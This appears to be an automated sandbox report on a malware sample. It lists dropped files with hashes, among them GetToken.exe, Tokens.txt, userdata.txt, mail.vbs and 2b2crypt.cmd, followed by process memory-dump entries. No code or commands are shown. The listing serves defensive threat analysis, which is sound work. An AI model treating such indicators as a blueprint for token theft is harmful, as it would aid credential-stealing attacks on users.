da827e4c4ff38e11bf5bdb76ff5fcfe45cb1a22b

SHA256
3ad1a2d04f1410c2aeeedef71b60453d6bbe7ed2bada635ccc03dd673e073973

SHA512
336b14e6d1c4b27a0d4fc6a3cb76bbfa271cef0f46f12515e18d3ed1388f9604f0ae7c0aa59220c150a3afca975cf794cf767dff6632cc8f89f161bdd64ef07a

Download Submit
C:\Users\Admin\Documents\black.bat

Filesize
71B

MD5
3544e4b7ac1418d34061648a9f3e3dc6

SHA1
30e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce

SHA256
db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8

SHA512
5d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126

Download Submit
C:\Users\Admin\Downloads\2b2crypt.cmd

Filesize
133B

MD5
9ba1673c3091ad1451841bddf6854bf7

SHA1
5cc13d5f009f2d4b9799100263625f8b3e0fa975

SHA256
37ad62436a4260aa4922a7103b1ebfae545c4be2a7ce86118d2a9514ac99d635

SHA512
f8ce53384d410b6e0b9b47ab9a4d211f467da4f5d10afa268e4b0d63f298b3b92a324a0529eb8a3ffc6be179890b8f41321be85eae92944464c7dc338442cab1

Download Submit
C:\Users\Admin\Downloads\2b2crypt.m.cmd

Filesize
139B

MD5
269ebb3dc0e208d9dd2cb151a3655c2f

SHA1
4bde16bcc0ce8a4e47b616027299ee779a84a278

SHA256
d2ef0748142bf6eff23944377539846456b2fa45de9517bdd92de2e16f8c4b5f

SHA512
75727a0cd8fd3c6343fd56a0de7f44d165e0f4814076d3b183984803b05f0ceed48e0d3d79a622225a747ca7df62d490d35d5aeca9e346c43c1d6c3704af6348

Download Submit
C:\Users\Admin\FuckPorts.cmd

Filesize
358B

MD5
07d68bb7aa6915adb05617fe1e37f36c

SHA1
0eea2f3c506e696c35c15b7e507f886d8e87676f

SHA256
134731595d0f89d5332dfeaf8e2d10fcfa1cc381d1d0691ab5f04259e4210c0e

SHA512
efb91001b8313d54a6e5afd6fdef9935e0412ff69692e410747f16d67c33ec74859221a2a37a3250edf3ff59b1efc569e589ba4158efc9df2e2bc2e13c26476d

Download Submit
C:\Users\Admin\GetToken.exe

Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\GetToken.exe

Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\IP.txt

Filesize
13B

MD5
50abaeee4fb79aeecc85d5072a758941

SHA1
eb60d1eb86b253850fbaf54eb967e2add6ce4929

SHA256
c53f2af0fca176a3644dbba8f22dc0a8784d9a656d78d8aa5d6c6076145f23fe

SHA512
35ba400f4b8efac46a8d2347e2cae74364b62e1adc43ee3c4b1c3be441b88331da8ceb2e8d976fa3bde4b150717340227ba16c2c42ee716946dde3f33b6fa78e

Download Submit
C:\Users\Admin\Tokens.txt

Filesize
22B

MD5
3d74b4a3f6053a5a252f4faee7fb157e

SHA1
576c1a2892dad89c3b6aba698ee67258be827eaf

SHA256
445f09c32e44ec144320d929de814ceda449da7efa062a19c1cc78cde29fb139

SHA512
dab16b5c564af14fb632f086b99530061d86f54cffed6bfa1b9ae59f97b77beec8ae89c132e2a217d555df512c75bb236921014ac0ff8053c88af16a96db7529

Download Submit
C:\Users\Admin\apps.txt

Filesize
8KB

MD5
6bf4cd4f0d7fe6d03030441cc05d10bc

SHA1
cc7017ae89ccd9881675d1374520c73ebfc09ca4

SHA256
d96b64543b6a19c6a9e660950d348f1690486ef2a68879f1694cac46158cb106

SHA512
fac10fd326830c2247497c59e2f6b391eb34c34bef5baa4a9ec12f60a4aa0342a9d18d81afeb0f476077dfbd6cfd9a3ce313b3f6a1dcb6d968a20c9856c4b883

Download Submit
C:\Users\Admin\loveletter.vbs

Filesize
495B

MD5
900ead69492d80e48738921eca28b14f

SHA1
6b51607c54f8e734a7ea47091859c3e8dce6365c

SHA256
c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3

SHA512
8fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2

Download Submit
C:\Users\Admin\mail.vbs

Filesize
488B

MD5
88ef4bc3f48eeb97aedadff8f3840980

SHA1
48e8167bef2562d902885a075f6190d269fd3d35

SHA256
b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa

SHA512
523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024

Download Submit
C:\Users\Admin\userdata.txt

Filesize
13KB

MD5
e50d243c8f3b4f6843335006e347c658

SHA1
0b7c1ddae63d51ccae975711518633c3c78ee431

SHA256
f992a2636b894135a39e2aa56ef3d3879e0759d90d09a5c33131766526c1cfe5

SHA512
806f17b562d915c0b5ddb0d44620e3fede1df73ba08d7758ac463a6c1adaa9af82e223378d33e45a44dbf0ec16cd26d5cd94224df3c8933ccfcf94063e0b7922

Download Submit
C:\Users\Admin\ycynlog.cmd

Filesize
51KB

MD5
4af79fa246608df60c78e02c1670f084

SHA1
0441d4e69225c12656c3855e24a2702d8737a227

SHA256
298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c

SHA512
5cc0cf9575c5688a8c1aaa966da1a2f49737dc6fe24f98437472c42f1ab48cd8277f9724f7bc0361dc57a4e4d31e2fe9cdbf417b75a6eb9a81fd61bcaa65ff8f

Download Submit
memory/256-151-0x0000000000000000-mapping.dmp

Download
memory/428-192-0x0000000000000000-mapping.dmp

Download
memory/444-135-0x0000000000000000-mapping.dmp

Download
memory/724-136-0x0000000000000000-mapping.dmp

Download
memory/1264-210-0x00007FFF94080000-0x00007FFF94B41000-memory.dmp

Filesize
10.8MB

Download
memory/1276-161-0x0000000000000000-mapping.dmp

Download
memory/1348-194-0x0000000000000000-mapping.dmp

Download
memory/1408-180-0x0000000000000000-mapping.dmp

Download
memory/1444-168-0x0000000000000000-mapping.dmp

Download
memory/1484-133-0x0000000000000000-mapping.dmp

Download
memory/1560-150-0x0000000000000000-mapping.dmp

Download
memory/1620-134-0x0000000000000000-mapping.dmp

Download
memory/1660-162-0x0000000000000000-mapping.dmp

Download
memory/1764-152-0x0000000000000000-mapping.dmp

Download
memory/1808-177-0x0000000000000000-mapping.dmp

Download
memory/1844-174-0x0000000000000000-mapping.dmp

Download
memory/1860-169-0x0000000000000000-mapping.dmp

Download
memory/2012-216-0x00007FFF94080000-0x00007FFF94B41000-memory.dmp

Filesize
10.8MB

Download
memory/2020-142-0x0000000000000000-mapping.dmp

Download
memory/2080-154-0x0000000000000000-mapping.dmp

Download
memory/2216-188-0x0000000000000000-mapping.dmp

Download
memory/2220-165-0x0000000000000000-mapping.dmp

Download
memory/2220-208-0x00007FFF94080000-0x00007FFF94B41000-memory.dmp

Filesize
10.8MB

Download
memory/2428-222-0x0000000000980000-0x0000000000988000-memory.dmp

Filesize
32KB

Download
memory/2496-158-0x0000000000000000-mapping.dmp

Download
memory/2560-189-0x0000000000000000-mapping.dmp

Download
memory/2564-223-0x00007FFF94080000-0x00007FFF94B41000-memory.dmp

Filesize
10.8MB

Download
memory/2584-164-0x0000000000000000-mapping.dmp

Download
memory/2652-213-0x00007FFF94080000-0x00007FFF94B41000-memory.dmp

Filesize
10.8MB

Download
memory/2868-185-0x0000000000000000-mapping.dmp

Download
memory/2916-171-0x0000000000000000-mapping.dmp

Download
memory/2928-149-0x0000000000000000-mapping.dmp

Download
memory/3016-155-0x0000000000000000-mapping.dmp

Download
memory/3056-179-0x0000000000000000-mapping.dmp

Download
memory/3076-184-0x0000000000000000-mapping.dmp

Download
memory/3132-209-0x00007FFF94080000-0x00007FFF94B41000-memory.dmp

Filesize
10.8MB

Download
memory/3140-182-0x0000000000000000-mapping.dmp

Download
memory/3476-145-0x0000000000000000-mapping.dmp

Download
memory/3528-187-0x0000000000000000-mapping.dmp

Download
memory/3548-186-0x0000000000000000-mapping.dmp

Download
memory/3704-153-0x0000000000000000-mapping.dmp

Download
memory/3724-176-0x0000000000000000-mapping.dmp

Download
memory/3732-191-0x0000000000000000-mapping.dmp

Download
memory/3768-170-0x0000000000000000-mapping.dmp

Download
memory/3860-190-0x0000000000000000-mapping.dmp

Download
memory/3904-157-0x0000000000000000-mapping.dmp

Download
memory/3956-147-0x0000000000000000-mapping.dmp

Download
memory/3968-181-0x0000000000000000-mapping.dmp

Download
memory/3984-175-0x0000000000000000-mapping.dmp

Download
memory/4016-178-0x0000000000000000-mapping.dmp

Download
memory/4060-207-0x00007FFF94080000-0x00007FFF94B41000-memory.dmp

Filesize
10.8MB

Download
memory/4092-193-0x0000000000000000-mapping.dmp

Download
memory/4128-183-0x0000000000000000-mapping.dmp

Download
memory/4180-166-0x0000000000000000-mapping.dmp

Download
memory/4252-137-0x0000000000000000-mapping.dmp

Download
memory/4252-138-0x000001C8DCEC0000-0x000001C8DCEE2000-memory.dmp

Filesize
136KB

Download
memory/4252-139-0x00007FFF951A0000-0x00007FFF95C61000-memory.dmp

Filesize
10.8MB

Download
memory/4376-160-0x0000000000000000-mapping.dmp

Download
memory/4412-143-0x0000000000000000-mapping.dmp

Download
memory/4540-201-0x00007FFF94080000-0x00007FFF94B41000-memory.dmp

Filesize
10.8MB

Download
memory/4568-156-0x0000000000000000-mapping.dmp

Download
memory/4604-167-0x0000000000000000-mapping.dmp

Download
memory/4636-141-0x0000000000000000-mapping.dmp

Download
memory/4644-146-0x0000000000000000-mapping.dmp

Download
memory/4704-196-0x0000000000000000-mapping.dmp

Download
memory/4704-131-0x0000000000000000-mapping.dmp

Download
memory/4724-140-0x0000000000000000-mapping.dmp

Download
memory/4812-132-0x0000000000000000-mapping.dmp

Download
memory/4856-159-0x0000000000000000-mapping.dmp

Download
memory/4860-229-0x00007FFF94080000-0x00007FFF94B41000-memory.dmp

Filesize
10.8MB

Download
memory/4872-195-0x0000000000000000-mapping.dmp

Download
memory/4872-130-0x0000000000000000-mapping.dmp

Download
memory/4900-172-0x0000000000000000-mapping.dmp

Download
memory/4960-163-0x0000000000000000-mapping.dmp

Download
memory/5036-144-0x0000000000000000-mapping.dmp

Download
memory/5108-173-0x0000000000000000-mapping.dmp

Download